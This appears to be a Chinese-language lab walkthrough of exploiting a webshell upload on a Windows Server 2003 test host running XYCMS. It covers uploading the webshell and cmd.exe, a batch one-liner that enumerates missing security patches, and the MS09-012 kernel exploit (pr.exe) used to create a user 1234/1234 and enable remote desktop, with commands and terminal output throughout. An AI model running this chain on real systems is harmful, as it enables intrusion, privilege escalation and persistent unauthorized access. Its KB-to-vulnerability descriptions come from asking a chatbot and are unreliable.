一句話木馬上傳漏洞的步驟

## 1. 流程先上傳一個一句話木馬 ## 2. 訪問一句話木馬，取得終端機，及檔案總管 ![image](https://hackmd.io/_uploads/rJSqll_LC.png) ## 3. 可上傳一句話木馬的地方，就可以視為一種可讀可寫的權限於此上傳一個cmd.exe(權限完整) ![image](https://hackmd.io/_uploads/ry0pll_LA.png) ## 4. 使用 ``` setp [以上傳cmd.exe的檔案絕對路徑] ``` 將有權限得cmd.exe改為預設cmd ## 5. 漏洞掃描(補丁) ``` systeminfo ``` 注意：如果遇到systeminfo指令不可用時，很大可能是因為對方作業系統的systeminfo.exe程式權限限制不夠或損壞，此時我們可以再次透過菜刀上傳systeminfo.exe，透過絕對路徑呼叫去執行這段命令是一段批次檔腳本（batch script），它主要用於檢查當前系統上是否安裝了特定的Windows更新補丁（KB編號），並輸出缺失的補丁。以下是詳細解釋： ### terminal反回 ``` C:\www.test\XYCMS\> systeminfo 主机名: OLDBOY-BFF81D0F OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition OS 版本: 5.2.3790 Service Pack 2 Build 3790 OS 制造商: Microsoft Corporation OS 配置: 独立服务器 OS 构件类型: Multiprocessor Free 注册的所有人: lin 注册的组织: oldboy 产品 ID: 69813-640-9722366-45998 初始安装日期: 2023-8-9, 20:24:50 系统启动时间: 0 天 0 小时 5 分 25 秒系统制造商: VMware, Inc. 系统型号: VMware Virtual Platform 系统类型: X86-based PC 处理器: 安装了 2 个处理器。 [01]: x86 Family 6 Model 141 Stepping 1 GenuineIntel ~2688 Mhz [02]: x86 Family 6 Model 141 Stepping 1 GenuineIntel ~2688 Mhz BIOS 版本: INTEL - 6040000 Windows 目录: C:\Windows 系统目录: C:\Windows\system32 启动设备: \Device\HarddiskVolume1 系统区域设置: zh-cn;中文(中国) 输入法区域设置: zh-cn;中文(中国) 时区: (GMT+08:00) 北京，重庆，香港特别行政区，乌鲁木齐物理内存总量: 2,047 MB 可用的物理内存: 1,576 MB 页面文件: 最大值: 3,944 MB 页面文件: 可用: 3,510 MB 页面文件: 使用中: 434 MB 页面文件位置: C:\pagefile.sys 域: WORKGROUP 登录服务器: 暂缺修补程序: 安装了 7 个修补程序。 [01]: File 1 [02]: File 1 [03]: File 1 [04]: Q147222 [05]: KB926140-v5 [06]: KB942288-v4 - Update [07]: KB954550-v5 网卡: 暂缺 ``` ### 1. `systeminfo>micropoor.txt` 這一部分命令將系統資訊輸出到名為 `micropoor.txt` 的檔案中。`systeminfo` 命令提供了有關系統配置的詳細資訊，包括已安裝的補丁。 ### 2. `&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)` 這部分命令是一個 `for` 迴圈，它會遍歷指定的KB補丁編號列表，檢查每一個補丁是否存在於 `micropoor.txt` 檔案中。 - `for %i in (...) do`：迴圈遍歷括號中的所有KB編號。 - `@type micropoor.txt`：顯示 `micropoor.txt` 檔案的內容。 - `| @find /i "%i"`：透過管道將 `micropoor.txt` 的內容傳遞給 `find` 命令，並查找當前迴圈中的KB編號（不區分大小寫）。 - `|| @echo %i you can fuck`：如果 `find` 命令未找到匹配的KB編號（即返回值非零），則執行 `echo` 命令，輸出KB編號和一段帶有攻擊性的文字（"you can fuck"）。 ### 3. `&del /f /q /a micropoor.txt` 這一部分命令用於刪除 `micropoor.txt` 檔案。 - `del`：刪除檔案。 - `/f`：強制刪除只讀檔案。 - `/q`：靜默模式，刪除時不提示確認。 - `/a`：刪除任何屬性的檔案（包括隱藏和系統檔案）。 ### 綜合解釋：這段腳本將系統資訊保存到 `micropoor.txt` 檔案，然後檢查系統是否安裝了指定的KB補丁。如果某個補丁未安裝，會輸出該補丁編號和一段帶有攻擊性的文字（"you can fuck"）。最後，刪除 `micropoor.txt` 檔案以清理臨時檔案。 ### 例子：假設系統上未安裝 `KB2160329` 補丁，執行腳本後會看到如下輸出： ``` KB2160329 you can fuck ``` ### 修改建議：由於輸出資訊包含攻擊性語言，可以考慮將其改為更友善的提示。例如： ```batch systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i is missing)&del /f /q /a micropoor.txt ``` ### terminal : ```terminal C:\www.test\XYCMS\> systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i is missing)&del /f /q /a micropoor.txt KB977165 is missing KB2160329 is missing KB2503665 is missing KB2592799 is missing KB2707511 is missing KB2829361 is missing KB2850851 is missing KB3000061 is missing KB3045171 is missing KB3077657 is missing KB3079904 is missing KB3134228 is missing KB3143141 is missing KB3141780 is missing ``` ### 詢問gpt得 ``` KB977165 - 修正了一個與SMB協定相關的安全漏洞，可能允許遠端執行程式碼。 KB2160329 - 解決了一個影響 Internet Explorer 的漏洞，可能允許遠端執行程式碼。 KB2503665 - 修正了Windows的漏洞，可能允許特權提升。 KB2592799 - 解決了一個影響Windows的漏洞，可能允許遠端執行程式碼。 KB2707511 - 修正了一個影響Windows核心的漏洞，可能允許特權提升。 KB2829361 - 修正了一個影響DirectShow的漏洞，可能允許遠端執行程式碼。 KB2850851 - 解決了一個影響 Internet Explorer 的漏洞，可能允許遠端執行程式碼。 KB3000061 - 修正了一個影響 ASP.NET 的漏洞，可能允許資訊外洩。 KB3045171 - 解決了一個影響Windows核心的漏洞，可能允許特權提升。 KB3077657 - 修正了一個影響Microsoft Windows的漏洞，可能允許特權提升。 KB3079904 - 修正了一個影響Windows的漏洞，可能允許特權提升。 KB3134228 - 修復了一個影響 Internet Explorer 的漏洞，可能允許遠端執行程式碼。 KB3143141 - 解決了一個影響Windows核心的漏洞，可能允許特權提升。 KB3141780 - 修正了一個影響Windows圖形元件的漏洞，可能允許遠端執行程式碼。 ``` ## 6. 利用漏洞其實上面的字典少了，這裡有多一點的 ```terminal C:\www.test\XYCMS\> systeminfo > micropoor.txt & (for %i in (KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 KB885835 KB896424 KB893066 KB890830 KB873333 KB891781 KB873339 KB885836 KB888113 KB890046 KB891861 KB893086 KB896358 KB899587 KB899588 KB900725 KB901214 KB902400 KB904706 KB905414 KB905749 KB908519 KB908531 KB910437 KB911562 KB911927 KB912919 KB913580 KB914388 KB915800 KB916281 KB917344 KB918118 KB918439 KB918899 KB919007 KB920213 KB920342 KB920670 KB920683 KB920685 KB922582 KB922819 KB923191 KB923414 KB923980 KB924270 KB924667 KB925398 KB925902 KB926122 KB926255 KB926436 KB927436 KB928843 KB928255 KB929123 KB930178 KB930916 KB931784 KB932168 KB932590 KB933566 KB935839 KB936021 KB936782 KB937143 KB938127 KB938464 KB939373 KB940541 KB941569 KB941644 KB942830 KB943055 KB943460 KB944338 KB944653 KB945553 KB946648 KB948496 KB950762 KB950974 KB951066 KB951748 KB952004 KB952954 KB953155 KB953298 KB953761 KB954155 KB954459 KB955069 KB955839 KB956803 KB957095 KB957097 KB958644 KB959426 KB959454 KB960225 KB960803 KB961501 KB961729 KB963093 KB967715 KB968389 KB968537 KB968585 KB969604 KB970430 KB971468 KB971657 KB971961 KB973507 KB973869 KB973904 KB974112 KB974318 KB974392 KB974571 KB975025 KB975467 KB975560 KB975713 KB976098 KB976323 KB976662 KB976749 KB977914 KB978037 KB978338 KB978542 KB978601 KB978695 KB978835 KB979309 KB979683 KB980232 KB981957 KB982316) do @findstr /i /c:"%i" micropoor.txt > nul || @echo %i is missing) & del /f /q micropoor.txt KB977165 is missing KB2160329 is missing KB2503665 is missing KB2592799 is missing KB2707511 is missing KB2829361 is missing KB2850851 is missing KB3000061 is missing KB3045171 is missing KB3077657 is missing KB3079904 is missing KB3134228 is missing KB3143141 is missing KB3141780 is missing KB885835 is missing KB896424 is missing KB893066 is missing KB890830 is missing KB873333 is missing KB891781 is missing KB873339 is missing KB885836 is missing KB888113 is missing KB890046 is missing KB891861 is missing KB893086 is missing KB896358 is missing KB899587 is missing KB899588 is missing KB900725 is missing KB901214 is missing KB902400 is missing KB904706 is missing KB905414 is missing KB905749 is missing KB908519 is missing KB908531 is missing KB910437 is missing KB911562 is missing KB911927 is missing KB912919 is missing KB913580 is missing KB914388 is missing KB915800 is missing KB916281 is missing KB917344 is missing KB918118 is missing KB918439 is missing KB918899 is missing KB919007 is missing KB920213 is missing KB920342 is missing KB920670 is missing KB920683 is missing KB920685 is missing KB922582 is missing KB922819 is missing KB923191 is missing KB923414 is missing KB923980 is missing KB924270 is missing KB924667 is missing KB925398 is missing KB925902 is missing KB926122 is missing KB926255 is missing KB926436 is missing KB927436 is missing KB928843 is missing KB928255 is missing KB929123 is missing KB930178 is missing KB930916 is missing KB931784 is missing KB932168 is missing KB932590 is missing KB933566 is missing KB935839 is missing KB936021 is missing KB936782 is missing KB937143 is missing KB938127 is missing KB938464 is missing KB939373 is missing KB940541 is missing KB941569 is missing KB941644 is missing KB942830 is missing KB943055 is missing KB943460 is missing KB944338 is missing KB944653 is missing KB945553 is missing KB946648 is missing KB948496 is missing KB950762 is missing KB950974 is missing KB951066 is missing KB951748 is missing KB952004 is missing KB952954 is missing KB953155 is missing KB953298 is missing KB953761 is missing KB954155 is missing KB954459 is missing KB955069 is missing KB955839 is missing KB956803 is missing KB957095 is missing KB957097 is missing KB958644 is missing KB959426 is missing KB959454 is missing //MS09-012 KB960225 is missing KB960803 is missing KB961501 is missing KB961729 is missing KB963093 is missing KB967715 is missing KB968389 is missing KB968537 is missing KB968585 is missing KB969604 is missing KB970430 is missing KB971468 is missing KB971657 is missing KB971961 is missing KB973507 is missing KB973869 is missing KB973904 is missing KB974112 is missing KB974318 is missing KB974392 is missing KB974571 is missing KB975025 is missing KB975467 is missing KB975560 is missing KB975713 is missing KB976098 is missing KB976323 is missing KB976662 is missing KB976749 is missing KB977914 is missing KB978037 is missing KB978338 is missing KB978542 is missing KB978601 is missing KB978695 is missing KB978835 is missing KB979309 is missing KB979683 is missing KB980232 is missing KB981957 is missing KB982316 is missing ``` ## MS09-012 [KB959454] 做範例 https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS09-012 有利用這一個的工具包閱讀readme.md 用法 ![image](https://hackmd.io/_uploads/ByRPD0DUC.png) 把pr.exe 傳上去使用他給的語法 ### 查看位置 ![image](https://hackmd.io/_uploads/Skb5iADIA.png) ### 增加user 1234 / 1234 ![image](https://hackmd.io/_uploads/SkVpoAwUR.png) ### 查看user 1234的資訊 ![image](https://hackmd.io/_uploads/B1oAoCvIA.png) ### 用pr1.exe 開啟 3389.exe ，開啟遠端桌面 ![image](https://hackmd.io/_uploads/r1oxnCD8A.png) 結束!!! 默念505好帥可以積陰德喔